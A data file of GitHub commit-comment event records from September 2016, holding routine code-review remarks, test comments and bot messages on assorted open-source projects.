{"id":"4519103304","type":"CommitCommentEvent","actor":{"login":"yesono"},"repo":{"name":"yesono/hello-word"},"payload":{"comment":{"id":18905341,"position":null,"line":null,"path":null,"commit_id":"50d4b02861905ece031f1ba367ea4552c1729fc8","created_at":"2016-09-06T03:53:12Z","updated_at":"2016-09-06T03:53:12Z","body":"read me"}},"created_at":"2016-09-06T03:53:12Z"}
{"id":"4519103321","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905342,"position":141,"line":141,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T03:53:12Z","updated_at":"2016-09-06T03:53:12Z","body":"@桂齐 \r\n是的，这里确实不规范，后来写的代码注意到统一维护这些数据了，有可能一个页面有多个请求接口的时候，统一维护很有必要"}},"created_at":"2016-09-06T03:53:12Z"}
{"id":"4519107749","type":"CommitCommentEvent","actor":{"login":"vlaja011"},"repo":{"name":"vlaja011/algs4"},"payload":{"comment":{"id":18905351,"position":null,"line":null,"path":null,"commit_id":"3916512fe4b5833757710fef99e5b80b1e15863d","created_at":"2016-09-06T03:55:15Z","updated_at":"2016-09-06T03:55:15Z","body":"from mac branch"}},"created_at":"2016-09-06T03:55:15Z"}
{"id":"4519109844","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18905354,"position":null,"line":null,"path":null,"commit_id":"cbf0ecce0e82d4ba27c83a25a4224c8677fd9619","created_at":"2016-09-06T03:56:12Z","updated_at":"2016-09-06T03:56:12Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-06T03:56:12Z"}
{"id":"4519111326","type":"CommitCommentEvent","actor":{"login":"ax003d"},"repo":{"name":"ax003d/GDMS_api"},"payload":{"comment":{"id":18905356,"position":null,"line":null,"path":null,"commit_id":"661a4c81a45b60c847a1d80ae36eff26c01a7e6b","created_at":"2016-09-06T03:56:54Z","updated_at":"2016-09-06T03:56:54Z","body":"Code was not recognized as API Description file. Not updating."}},"created_at":"2016-09-06T03:56:54Z"}
{"id":"4519114215","type":"CommitCommentEvent","actor":{"login":"mang1225"},"repo":{"name":"mang1225/TestHandler"},"payload":{"comment":{"id":18905358,"position":null,"line":null,"path":null,"commit_id":"16f24f0a2b1962639d9c10ca1d21acdf54ff0ec5","created_at":"2016-09-06T03:58:21Z","updated_at":"2016-09-06T03:58:21Z","body":"之前研究过handler 和 looper 消息队列，不过android里的handler不是另外开启线程来执行的，还是在主UI线程中，如果想另启线程的话需要用到HandlerThread来实现。在使用HandlerThread的时候需要实现CallBack接口以重写handlerMessage方法，在handlerMessage方法中来处理自己的逻辑。下来给出一个小例子程序。\r\n"}},"created_at":"2016-09-06T03:58:21Z"}
{"id":"4519115156","type":"CommitCommentEvent","actor":{"login":"wildweasel486"},"repo":{"name":"wildweasel486/ww-cash2"},"payload":{"comment":{"id":18905361,"position":null,"line":null,"path":null,"commit_id":"8fae1ada4bd9cd465cd96a26811eddf5bc1a8205","created_at":"2016-09-06T03:58:53Z","updated_at":"2016-09-06T03:58:53Z","body":"Yeah to tell the truth I've basically been using the Issues to note things I'll do later when I'm in the mood to mod again (which I'm not sure when that'll be)...I seem to recall bringing you into the project specifically for the menu system (thanks again for that by the way, it's so much more usable and I might not even need to do the scrolling thing like I thought I might...)."}},"created_at":"2016-09-06T03:58:53Z"}
{"id":"4519119993","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905367,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T04:00:54Z","updated_at":"2016-09-06T04:00:54Z","body":"comment on commit123"}},"created_at":"2016-09-06T04:00:54Z"}
{"id":"4519120064","type":"CommitCommentEvent","actor":{"login":"expert-soft"},"repo":{"name":"txbits/txbits"},"payload":{"comment":{"id":18905368,"position":null,"line":null,"path":null,"commit_id":"9beed6c58953d3cc708f8184ee61e02be5eecfef","created_at":"2016-09-06T04:00:56Z","updated_at":"2016-09-06T04:00:56Z","body":"removePGP bug\r\n"}},"created_at":"2016-09-06T04:00:56Z"}
{"id":"4519120119","type":"CommitCommentEvent","actor":{"login":"kieckhafer"},"repo":{"name":"xusai2014/reaction-paypal"},"payload":{"comment":{"id":18905369,"position":null,"line":null,"path":null,"commit_id":"ce498b513e06fa519bbf1249223d6e8f957c2a74","created_at":"2016-09-06T04:00:57Z","updated_at":"2016-09-06T04:00:57Z","body":"Hi,\r\n\r\nPlease join us in our Gitter channel. We'll be able to help you more efficiently there.\r\n\r\nThanks!\r\n\r\n[![Gitter](https://badges.gitter.im/reactioncommerce/reaction.svg)](https://gitter.im/reactioncommerce/reaction?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\r\n"}},"created_at":"2016-09-06T04:00:57Z"}
{"id":"4519122230","type":"CommitCommentEvent","actor":{"login":"syshin-fasoo"},"repo":{"name":"syshin-fasoo/hello-world"},"payload":{"comment":{"id":18905373,"position":null,"line":null,"path":null,"commit_id":"aa01f4ad67be1b20e77c0790edb79c2b3b17ef49","created_at":"2016-09-06T04:01:59Z","updated_at":"2016-09-06T04:01:59Z","body":"한국 사람은 한글로 씁시다. "}},"created_at":"2016-09-06T04:01:59Z"}
{"id":"4519122405","type":"CommitCommentEvent","actor":{"login":"edthebat"},"repo":{"name":"wildweasel486/ww-cash2"},"payload":{"comment":{"id":18905374,"position":null,"line":null,"path":null,"commit_id":"8fae1ada4bd9cd465cd96a26811eddf5bc1a8205","created_at":"2016-09-06T04:02:04Z","updated_at":"2016-09-06T04:02:04Z","body":"That's right. And you're welcome. Should the mood ever strike you again, I'd certainly be interested to see what new content you'd come up with. And of course, I'm always happy to contribute where I'm able."}},"created_at":"2016-09-06T04:02:04Z"}
{"id":"4519124038","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905376,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T04:02:47Z","updated_at":"2016-09-06T04:02:47Z","body":"comment on commitcomment 123"}},"created_at":"2016-09-06T04:02:47Z"}
{"id":"4519124181","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905377,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T04:02:51Z","updated_at":"2016-09-06T04:02:51Z","body":"comment on commitcomment 123"}},"created_at":"2016-09-06T04:02:51Z"}
{"id":"4519129382","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18905384,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T04:05:14Z","updated_at":"2016-09-06T04:05:14Z","body":"comment from group 123"}},"created_at":"2016-09-06T04:05:14Z"}
{"id":"4519130862","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18905386,"position":6,"line":0,"path":"truffle/src/main/ruby/core/io.rb","commit_id":"d4a8f66619dff48776aa680df4775e24341a2331","created_at":"2016-09-06T04:05:58Z","updated_at":"2016-09-06T04:05:58Z","body":"Why not buffer = nil as before?"}},"created_at":"2016-09-06T04:05:58Z"}
{"id":"4519132341","type":"CommitCommentEvent","actor":{"login":"zoeyhe"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18905389,"position":11,"line":82,"path":"product/计算与网络/私有网络/最佳实践/VPC内通过keepalived搭建高可用主备集群.md","commit_id":"f22132394aab0bdb0ff6cd0a931c4f5441f0ea22","created_at":"2016-09-06T04:06:43Z","updated_at":"2016-09-06T04:06:43Z","body":"test @hebinbinSEU "}},"created_at":"2016-09-06T04:06:43Z"}
{"id":"4519139341","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18905392,"position":21,"line":47,"path":"tests/printf.in","commit_id":"363fa0a59884fbd5dc433fc31df17b78833704c6","created_at":"2016-09-06T04:10:17Z","updated_at":"2016-09-06T04:10:17Z","body":"Gosh, is this as good as it goes? Could we perhaps query the locales installed by `locale -kc LC_NUMERIC` instead of \"shaking it until it works\"?"}},"created_at":"2016-09-06T04:10:17Z"}
{"id":"4519141381","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18905394,"position":21,"line":47,"path":"tests/printf.in","commit_id":"363fa0a59884fbd5dc433fc31df17b78833704c6","created_at":"2016-09-06T04:11:11Z","updated_at":"2016-09-06T04:11:11Z","body":"Actually. Is there anything at all bogus about us defining our own locale environment for the purposes of doing the tests?"}},"created_at":"2016-09-06T04:11:11Z"}
{"id":"4519148230","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905404,"position":33,"line":248,"path":"openstudiocore/src/cli/main.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-06T04:14:27Z","updated_at":"2016-09-06T04:14:27Z","body":"Yeah, it's an abomination, it's been bothering me all weekend.  I'm gonna put back in the system library calls in ApplicationPathHelpers.hpp, I also want to move Application.hpp to ModelEditor lib."}},"created_at":"2016-09-06T04:14:27Z"}
{"id":"4519151446","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905408,"position":17,"line":832,"path":"init.el","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T04:15:56Z","updated_at":"2016-09-06T04:15:56Z","body":"We don't want to use `custom` in the init-file. This should be replaceable with a direct call to the theme management functions.\r\n\r\nAlso, which theme is this for?"}},"created_at":"2016-09-06T04:15:56Z"}
{"id":"4519152574","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905412,"position":5,"line":153,"path":"scripts/setup.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T04:16:26Z","updated_at":"2016-09-06T04:16:26Z","body":"Does `apt-get` only have 2.1?"}},"created_at":"2016-09-06T04:16:26Z"}
{"id":"4519152792","type":"CommitCommentEvent","actor":{"login":"ax003d"},"repo":{"name":"ax003d/GDMS_api"},"payload":{"comment":{"id":18905414,"position":null,"line":null,"path":null,"commit_id":"661a4c81a45b60c847a1d80ae36eff26c01a7e6b","created_at":"2016-09-06T04:16:32Z","updated_at":"2016-09-06T04:16:32Z","body":"Code was not recognized as API Description file. Not updating."}},"created_at":"2016-09-06T04:16:32Z"}
{"id":"4519156693","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905424,"position":4,"line":4,"path":"scripts/install-jdk8-linux.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T04:18:33Z","updated_at":"2016-09-06T04:18:33Z","body":"I feel like this should be going through `ensure-installed` to avoid calling `apt-get` if it's not necessary."}},"created_at":"2016-09-06T04:18:33Z"}
{"id":"4519156976","type":"CommitCommentEvent","actor":{"login":"blookvoodow"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18905426,"position":null,"line":null,"path":null,"commit_id":"7118b066fbfd5fc5beab8d39ecbaa0c4f5d7ae27","created_at":"2016-09-06T04:18:41Z","updated_at":"2016-09-06T04:18:41Z","body":"Using TCPView on windows 10. It seems I'm sending and receiving about the same number of packets with this script enabled or with it disabled. Hope people on different os get more preferable results"}},"created_at":"2016-09-06T04:18:41Z"}
{"id":"4519158610","type":"CommitCommentEvent","actor":{"login":"tynbendad"},"repo":{"name":"tynbendad/simplecgmanalog"},"payload":{"comment":{"id":18905428,"position":null,"line":null,"path":null,"commit_id":"a645a3ddcf52836763ce9560a18df8175335e1ef","created_at":"2016-09-06T04:19:28Z","updated_at":"2016-09-06T04:19:28Z","body":"that is \"old\" vibrate"}},"created_at":"2016-09-06T04:19:28Z"}
{"id":"4519160635","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18905434,"position":21,"line":47,"path":"tests/printf.in","commit_id":"363fa0a59884fbd5dc433fc31df17b78833704c6","created_at":"2016-09-06T04:20:27Z","updated_at":"2016-09-06T04:20:27Z","body":"How does `locale -kc LC_NUMERIC` help us? That simply reports the decimal point of the current locale. We deliberately want to verify that our numeric conversions and printf command work if the decimal point is not the english standard of \".\". If you know of a way to define a custom environment that works on developer systems as well as Travis that would be a great way to solve this."}},"created_at":"2016-09-06T04:20:27Z"}
{"id":"4519161318","type":"CommitCommentEvent","actor":{"login":"jambilateralus"},"repo":{"name":"jambilateralus/FohorAayo"},"payload":{"comment":{"id":18905438,"position":null,"line":null,"path":null,"commit_id":"85b0e97b12f34fe22da11f6facbe968f7133cf55","created_at":"2016-09-06T04:20:47Z","updated_at":"2016-09-06T04:20:47Z","body":"https://github.com/delight-im/Android-SimpleLocation"}},"created_at":"2016-09-06T04:20:47Z"}
{"id":"4519161516","type":"CommitCommentEvent","actor":{"login":"syshin-fasoo"},"repo":{"name":"syshin-fasoo/hello-world"},"payload":{"comment":{"id":18905439,"position":null,"line":null,"path":null,"commit_id":"acdf771cd549f3f5d977831d766ae2abcc6c5bb0","created_at":"2016-09-06T04:20:53Z","updated_at":"2016-09-06T04:20:53Z","body":"빈 줄이 없으며 더 좋겠어요"}},"created_at":"2016-09-06T04:20:53Z"}
{"id":"4519162660","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905444,"position":31,"line":204,"path":"scripts/setup.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T04:21:30Z","updated_at":"2016-09-06T04:21:30Z","body":"This should only be run on Linux, presumably."}},"created_at":"2016-09-06T04:21:30Z"}
{"id":"4519163329","type":"CommitCommentEvent","actor":{"login":"liu21st"},"repo":{"name":"top-think/framework"},"payload":{"comment":{"id":18905447,"position":null,"line":null,"path":null,"commit_id":"bd0968b4076159993d94838d57093041545c2c50","created_at":"2016-09-06T04:21:49Z","updated_at":"2016-09-06T04:21:49Z","body":"因为控制器类名本来就是驼峰命名的"}},"created_at":"2016-09-06T04:21:49Z"}
{"id":"4519165037","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905450,"position":21,"line":45,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-06T04:22:38Z","updated_at":"2016-09-06T04:22:38Z","body":"I think this information should be stored in a variable so that we're not doing the check more than once. This way, if more OS's are added in future, then we don't have to worry about updating all of the instances."}},"created_at":"2016-09-06T04:22:38Z"}
{"id":"4519166151","type":"CommitCommentEvent","actor":{"login":"griest024"},"repo":{"name":"ELynx/pokemon-go-xposed-mitm"},"payload":{"comment":{"id":18905452,"position":null,"line":null,"path":null,"commit_id":"d9e1e035643d3d16dc3150ee54e8050fb0f3eaef","created_at":"2016-09-06T04:23:14Z","updated_at":"2016-09-06T04:23:14Z","body":"Yes I was still trying to get built-in jruby to work...for now that is a lost cause"}},"created_at":"2016-09-06T04:23:14Z"}
{"id":"4519166787","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905453,"position":92,"line":132,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-06T04:23:33Z","updated_at":"2016-09-06T04:23:33Z","body":"`finger` is not available on Homebrew, so this should only be run on Linux."}},"created_at":"2016-09-06T04:23:33Z"}
{"id":"4519167060","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905454,"position":91,"line":131,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-06T04:23:41Z","updated_at":"2016-09-06T04:23:41Z","body":"`apt-get` has only version 5.1?"}},"created_at":"2016-09-06T04:23:41Z"}
{"id":"4519167618","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18905456,"position":21,"line":47,"path":"tests/printf.in","commit_id":"363fa0a59884fbd5dc433fc31df17b78833704c6","created_at":"2016-09-06T04:23:58Z","updated_at":"2016-09-06T04:23:58Z","body":"Sure, you define a locale with `localedef`."}},"created_at":"2016-09-06T04:23:58Z"}
{"id":"4519169355","type":"CommitCommentEvent","actor":{"login":"frasimorgil"},"repo":{"name":"frasimorgil/Inputloop"},"payload":{"comment":{"id":18905458,"position":null,"line":null,"path":null,"commit_id":"643c916b9bbd88ca0d0cc288c6bae5a0ad31353f","created_at":"2016-09-06T04:24:43Z","updated_at":"2016-09-06T04:24:43Z","body":"Exercise from Slide 8.5 input loop"}},"created_at":"2016-09-06T04:24:43Z"}
{"id":"4519170039","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905459,"position":3,"line":3,"path":"scripts/install-lein-linux.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-06T04:25:03Z","updated_at":"2016-09-06T04:25:03Z","body":"Use the `-O` flag, otherwise this will not work correctly when the download is aborted and then the setup script is run again. (The newly downloaded file will be saved under a different name if something called `lein` already exists in the current directory, and the non-working, half-downloaded version will be moved to `/usr/local/bin`.)"}},"created_at":"2016-09-06T04:25:03Z"}
{"id":"4519175293","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905466,"position":4,"line":4,"path":"scripts/install-lein-linux.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-06T04:27:29Z","updated_at":"2016-09-06T04:27:29Z","body":"I think it's better to ensure that `/usr/local/bin` is writeable to non-sudoers. This should be a requirement anyway, since Homebrew will break if `/usr/local/bin` is not writeable without sudo. (In fact, Homebrew refuses to run with sudo privileges.)\r\n\r\nBy default (or perhaps when Homebrew is installed?) this is set up correctly on Macs, but it *may* break on OS upgrades because Apple wants to \"fix\" the permissions. I haven't yet had an opportunity to test this, but it's something to be aware of.\r\n\r\nIt seems that the permissions are not set this way on Linux by default, though. So we will need an `ensure-usr-local-bin-writeable.sh` (or something better named) in any case."}},"created_at":"2016-09-06T04:27:29Z"}
{"id":"4519175900","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18905467,"position":5,"line":15,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-06T04:27:46Z","updated_at":"2016-09-06T04:27:46Z","body":"These random blank lines should be removed."}},"created_at":"2016-09-06T04:27:46Z"}
{"id":"4519178194","type":"CommitCommentEvent","actor":{"login":"GongWonBae"},"repo":{"name":"hmk20000/AU2016Checker-server"},"payload":{"comment":{"id":18905471,"position":null,"line":null,"path":null,"commit_id":"b79f63bf04df1bc95dff5756b24abd27356103d6","created_at":"2016-09-06T04:28:54Z","updated_at":"2016-09-06T04:28:54Z","body":"merge?!"}},"created_at":"2016-09-06T04:28:54Z"}
{"id":"4519178534","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18905473,"position":null,"line":null,"path":null,"commit_id":"56f03c92c98151ace659c856516d4d084444377e","created_at":"2016-09-06T04:29:05Z","updated_at":"2016-09-06T04:29:05Z","body":"Typo on git message... \"update Artermis\""}},"created_at":"2016-09-06T04:29:05Z"}
{"id":"4519179003","type":"CommitCommentEvent","actor":{"login":"satuki2528"},"repo":{"name":"satuki2528/assessment"},"payload":{"comment":{"id":18905475,"position":null,"line":null,"path":null,"commit_id":"8d6c0d1874142b3125c7eb150da82e3a3b912bd1","created_at":"2016-09-06T04:29:18Z","updated_at":"2016-09-06T04:29:18Z","body":"あきらめちゃだめ"}},"created_at":"2016-09-06T04:29:18Z"}
{"id":"4519180190","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905477,"position":33,"line":248,"path":"openstudiocore/src/cli/main.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-06T04:29:54Z","updated_at":"2016-09-06T04:29:54Z","body":"Looks like I can't move Application out of utilities unless we move these as well:\r\n\r\nProgressBar - ok to move to ModelEditor lib\r\nWorkspaceWatcher - not sure we really need to call QApplication processEvents, @mbadams5 ?\r\nIdfObjectWatcher - not sure we really need to call QApplication processEvents, @mbadams5 ?\r\nUpdateManager - ok to move to ModelEditor lib \r\nSystem::msleep -  ok to remove QApplication processEvents\r\nPathWatcher - ok to move to ModelEditor lib\r\nRemoteBCL - needs network, without Qt maybe need to move to BCL gem?\r\nLocalBCL - maybe need to move to BCL gem?"}},"created_at":"2016-09-06T04:29:54Z"}
{"id":"4519182249","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905483,"position":33,"line":248,"path":"openstudiocore/src/cli/main.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-06T04:30:49Z","updated_at":"2016-09-06T04:30:49Z","body":"Anyway, moving Application out of utilities won't happen soon, we'll just need to re-impliment applicationRunDir"}},"created_at":"2016-09-06T04:30:49Z"}
{"id":"4519183471","type":"CommitCommentEvent","actor":{"login":"Heidyvi"},"repo":{"name":"Heidyvi/Prueba_1.0"},"payload":{"comment":{"id":18905487,"position":null,"line":null,"path":null,"commit_id":"abc6dfe1e5021a0e1cb7e2c0bd57371e0af66ec3","created_at":"2016-09-06T04:31:28Z","updated_at":"2016-09-06T04:31:28Z","body":"error"}},"created_at":"2016-09-06T04:31:28Z"}
{"id":"4519185752","type":"CommitCommentEvent","actor":{"login":"Heidyvi"},"repo":{"name":"Heidyvi/Prueba_1.0"},"payload":{"comment":{"id":18905492,"position":null,"line":null,"path":null,"commit_id":"abc6dfe1e5021a0e1cb7e2c0bd57371e0af66ec3","created_at":"2016-09-06T04:32:37Z","updated_at":"2016-09-06T04:32:37Z","body":"abc6dfe"}},"created_at":"2016-09-06T04:32:37Z"}
{"id":"4519192366","type":"CommitCommentEvent","actor":{"login":"ngochedev"},"repo":{"name":"ngochedev/AlgoPractice1"},"payload":{"comment":{"id":18905513,"position":25,"line":null,"path":"ArrayTests/ArrayTests.cs","commit_id":"a2934263e8e47189163e5d1a2731f46552d6486c","created_at":"2016-09-06T04:35:56Z","updated_at":"2016-09-06T04:35:56Z","body":"Please consider changing this. This comment from my iPhone\n"}},"created_at":"2016-09-06T04:35:56Z"}
{"id":"4519192606","type":"CommitCommentEvent","actor":{"login":"coderdan"},"repo":{"name":"AusDTO/gov-au-beta"},"payload":{"comment":{"id":18905515,"position":8,"line":12,"path":"app/controllers/nodes_controller.rb","commit_id":"b3ecd23624f711d352982f22bafbc322fec435c8","created_at":"2016-09-06T04:36:02Z","updated_at":"2016-09-06T04:36:02Z","body":"I'd prefer to use the Rollbar filtering capability here but if you're going to use this approach you should perhaps consider the use of rescue_from"}},"created_at":"2016-09-06T04:36:02Z"}
{"id":"4519193715","type":"CommitCommentEvent","actor":{"login":"coderdan"},"repo":{"name":"AusDTO/gov-au-beta"},"payload":{"comment":{"id":18905518,"position":1,"line":1,"path":"app/helpers/logging_helper.rb","commit_id":"b3ecd23624f711d352982f22bafbc322fec435c8","created_at":"2016-09-06T04:36:35Z","updated_at":"2016-09-06T04:36:35Z","body":"Don't use a helper like a class."}},"created_at":"2016-09-06T04:36:35Z"}
{"id":"4519194128","type":"CommitCommentEvent","actor":{"login":"ngochedev"},"repo":{"name":"ngochedev/AlgoPractice1"},"payload":{"comment":{"id":18905519,"position":36,"line":null,"path":"ArrayTests/ArrayTests.cs","commit_id":"a2934263e8e47189163e5d1a2731f46552d6486c","created_at":"2016-09-06T04:36:50Z","updated_at":"2016-09-06T04:36:50Z","body":"Canes think about another data structure here?\n"}},"created_at":"2016-09-06T04:36:50Z"}
{"id":"4519194515","type":"CommitCommentEvent","actor":{"login":"zawp988"},"repo":{"name":"GoogleChrome/sw-helpers"},"payload":{"comment":{"id":18905520,"position":null,"line":null,"path":null,"commit_id":"abb26ecac046f8491a958b075a86b3c219b193e2","created_at":"2016-09-06T04:37:01Z","updated_at":"2016-09-06T04:37:01Z","body":"![screenshot_2016-09-05-23-39-46](https://cloud.githubusercontent.com/assets/22012013/18261780/d834e238-7421-11e6-85ec-ded32f41a0f4.png)\r\n![screenshot_2016-09-05-23-38-23]      (https://cloud.githubusercontent.com/assets/22012013/18261800/f35f7e24-7421-11e6-9498-e3b51e35ffdd.png)\r\n"}},"created_at":"2016-09-06T04:37:01Z"}
{"id":"4519195688","type":"CommitCommentEvent","actor":{"login":"GeetB"},"repo":{"name":"GeetB/datasharing"},"payload":{"comment":{"id":18905522,"position":null,"line":null,"path":null,"commit_id":"c179250410139c62c1af03fafa4916822de8b30a","created_at":"2016-09-06T04:37:36Z","updated_at":"2016-09-06T04:37:36Z","body":"Done"}},"created_at":"2016-09-06T04:37:36Z"}
{"id":"4519195920","type":"CommitCommentEvent","actor":{"login":"PMS22"},"repo":{"name":"FireHound/android_frameworks_base"},"payload":{"comment":{"id":18905523,"position":null,"line":null,"path":null,"commit_id":"d16a4ba2ad3b5ef763ff628ef186039c3e62612d","created_at":"2016-09-06T04:37:42Z","updated_at":"2016-09-06T04:37:42Z","body":"This will fix lines (batterybar) on navigation bar.. "}},"created_at":"2016-09-06T04:37:42Z"}
{"id":"4519196177","type":"CommitCommentEvent","actor":{"login":"zhangzaki"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18905524,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T04:37:50Z","updated_at":"2016-09-06T04:37:50Z","body":"Can you send the steps on your production?"}},"created_at":"2016-09-06T04:37:50Z"}
{"id":"4519197290","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18905526,"position":null,"line":null,"path":null,"commit_id":"fab6af536eb328c4ddb386e67f6f34a1cf3b4b1d","created_at":"2016-09-06T04:38:25Z","updated_at":"2016-09-06T04:38:25Z","body":"Take a look at this when you get a chance @Daniel17sep \r\nIf you could note any serious vulnerabilities or features not covered by code or a TODO"}},"created_at":"2016-09-06T04:38:25Z"}
{"id":"4519197770","type":"CommitCommentEvent","actor":{"login":"coderdan"},"repo":{"name":"AusDTO/gov-au-beta"},"payload":{"comment":{"id":18905529,"position":null,"line":null,"path":null,"commit_id":"b3ecd23624f711d352982f22bafbc322fec435c8","created_at":"2016-09-06T04:38:40Z","updated_at":"2016-09-06T04:38:40Z","body":"@maxious whats the difference between audit and log_event?"}},"created_at":"2016-09-06T04:38:40Z"}
{"id":"4519198880","type":"CommitCommentEvent","actor":{"login":"mrchapp"},"repo":{"name":"mrchapp/meta-96boards"},"payload":{"comment":{"id":18905530,"position":1,"line":1,"path":"recipes-graphics/wayland/weston-init/71-weston-input.rules","commit_id":"61dd3450983d7a626c80c32908344fccad8ddb43","created_at":"2016-09-06T04:39:19Z","updated_at":"2016-09-06T04:39:19Z","body":"\"event[0-9]*\" or just \"event0\"?"}},"created_at":"2016-09-06T04:39:19Z"}
{"id":"4519201073","type":"CommitCommentEvent","actor":{"login":"zawp988"},"repo":{"name":"GoogleChrome/sw-helpers"},"payload":{"comment":{"id":18905537,"position":null,"line":null,"path":null,"commit_id":"abb26ecac046f8491a958b075a86b3c219b193e2","created_at":"2016-09-06T04:40:22Z","updated_at":"2016-09-06T04:40:22Z","body":"Draw a two i phone  ''http://viral.mobile_apps_1.com\"say:"}},"created_at":"2016-09-06T04:40:22Z"}
{"id":"4519201500","type":"CommitCommentEvent","actor":{"login":"fanqq"},"repo":{"name":"eternityspring/eternityspring.github.io"},"payload":{"comment":{"id":18905539,"position":444,"line":442,"path":"bundle.js","commit_id":"0430305cbe760205e2645b1d5fb66a681c1aa893","created_at":"2016-09-06T04:40:35Z","updated_at":"2016-09-06T04:40:35Z","body":"."}},"created_at":"2016-09-06T04:40:35Z"}
{"id":"4519202092","type":"CommitCommentEvent","actor":{"login":"maxious"},"repo":{"name":"AusDTO/gov-au-beta"},"payload":{"comment":{"id":18905542,"position":null,"line":null,"path":null,"commit_id":"b3ecd23624f711d352982f22bafbc322fec435c8","created_at":"2016-09-06T04:40:53Z","updated_at":"2016-09-06T04:40:53Z","body":"Audit logging is a change on any model (create, update, destroy). \r\n\r\nSecops also asked that for some specific events around users and authentication that additional logging was made of those events including failed logins where no database change would usually occur."}},"created_at":"2016-09-06T04:40:53Z"}
